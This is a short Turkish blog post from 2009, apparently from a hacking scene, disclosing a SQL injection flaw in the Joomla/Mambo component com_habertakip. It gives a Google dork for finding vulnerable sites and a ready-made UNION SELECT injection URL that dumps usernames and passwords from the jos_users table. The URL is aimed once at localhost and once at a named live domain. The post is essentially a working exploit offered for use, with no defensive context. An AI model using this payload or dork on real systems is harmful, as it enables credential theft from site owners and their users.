16 Aralık 2009 Çarşamba

Joomla / Mambo com_habertakip SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_habertakip

http:/localhost/index.php?option=com_habertakip&task=newsView&newsId=inj code..


http:/localhost/index.php?option=com_habertakip&task=newsView&newsId=1879666+and+1=2+ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(username,0x3D,password) from jos_users


http://www.habertakip.com/index.php?option=com_habertakip&task=newsView&newsId=1879666+and+1=2+ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(username,0x3D,password) from jos_users

Hiç yorum yok :

Yorum Gönder